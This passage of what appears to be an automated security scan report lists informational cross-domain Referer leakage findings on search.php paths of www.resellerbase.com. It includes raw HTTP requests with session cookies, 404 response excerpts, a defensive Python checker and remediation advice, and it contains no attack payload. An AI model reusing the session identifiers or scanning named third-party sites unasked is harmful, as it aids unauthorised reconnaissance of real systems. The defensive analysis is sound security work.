Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.143. http://www.resellerbase.com/detail/19/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.144. http://www.resellerbase.com/detail/19/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.145. http://www.resellerbase.com/detail/20/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.146. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/20/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.147. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.148. http://www.resellerbase.com/detail/20/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.149. http://www.resellerbase.com/detail/20/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.150. http://www.resellerbase.com/detail/22/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/22/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.151. http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...
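The issue detail above, repeated for every finding in this section, describes one check: the request URL carried a query string and the 404 page links to hosts other than www.resellerbase.com, so a user who follows one of those links sends the query string to a third party in the Referer header. The following Python is an added example, not part of the XSS.CX/Burp output, that reproduces that check over the request from 6.151 and the visible part of its response. The request block and the response body are constructed inputs copied from the report (the snipped remainder of the page is not reconstructed), and the http scheme is an assumption taken from the plain-HTTP requests shown.

```python
"""Cross-domain Referer leakage check, as reported in the findings above.

Added example (not part of the original scan report). It parses a raw
HTTP request block like the ones in the report, rebuilds the request
URL, and lists the foreign hosts linked from the response body. The
report's condition is: query string present AND links to other domains.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed input: the request from finding 6.151, copied from the report.
RAW_REQUEST = """GET /detail/22/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
"""

# Constructed input: the visible part of the 404 body (the report snips the rest).
RESPONSE_BODY = """<html><head><title>Error 404</title></head><body>
<table><tr><td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" /></a>
</td></tr></table></body></html>
"""


def url_from_raw_request(raw, scheme="http"):
    """Rebuild the absolute URL from the request line and the Host header.
    The scheme is assumed: the report shows plain-HTTP requests."""
    lines = raw.strip().splitlines()
    _method, target, _version = lines[0].split()
    host = next(line.split(":", 1)[1].strip()
                for line in lines[1:] if line.lower().startswith("host:"))
    return f"{scheme}://{host}{target}"


class _LinkCollector(HTMLParser):
    """Gather every href/src/action attribute value from the markup."""
    ATTRS = {"href", "src", "action"}

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in self.ATTRS and value:
                self.urls.append(value)


def cross_domain_hosts(request_url, html):
    """Hostnames linked from html that differ from the request's host.
    Relative links have no host and are skipped; scheme-relative links
    (//host/...) count, because the browser resolves them to a host."""
    own_host = urlsplit(request_url).hostname
    collector = _LinkCollector()
    collector.feed(html)
    hosts = set()
    for url in collector.urls:
        parts = urlsplit(url)
        if parts.scheme not in ("", "http", "https"):
            continue  # mailto:, javascript:, data: links carry no Referer
        if parts.hostname and parts.hostname != own_host:
            hosts.add(parts.hostname)
    return sorted(hosts)


def referer_leakage(request_url, html):
    """Apply the report's condition: query string present and at least one
    foreign link. Returns the foreign hosts, or [] when nothing would leak."""
    if not urlsplit(request_url).query:
        return []
    return cross_domain_hosts(request_url, html)


if __name__ == "__main__":
    url = url_from_raw_request(RAW_REQUEST)
    print(url)
    print("query string would reach:", referer_leakage(url, RESPONSE_BODY))
```

Two details worth noting when triaging these entries. The first foreign link is `http://validator.w3.org/check?uri=referer`, which tells the W3C validator to fetch whatever URL arrives in the Referer header, so a click on that badge sends the full search URL, `keyword=` value included, to w3.org by design. Second, because the leaking markup is the site's shared 404 template, every one of the `search.php` paths below reports the same two hosts; the fix is one change to the template (drop the badges or add `rel="noreferrer"`) or a `Referrer-Policy` response header such as `strict-origin-when-cross-origin`, which strips the path and query from cross-origin Referers.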

6.152. http://www.resellerbase.com/detail/22/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.153. http://www.resellerbase.com/detail/22/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/22/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.154. http://www.resellerbase.com/detail/22/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.155. http://www.resellerbase.com/detail/23/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.156. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.157. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.158. http://www.resellerbase.com/detail/23/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.159. http://www.resellerbase.com/detail/23/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
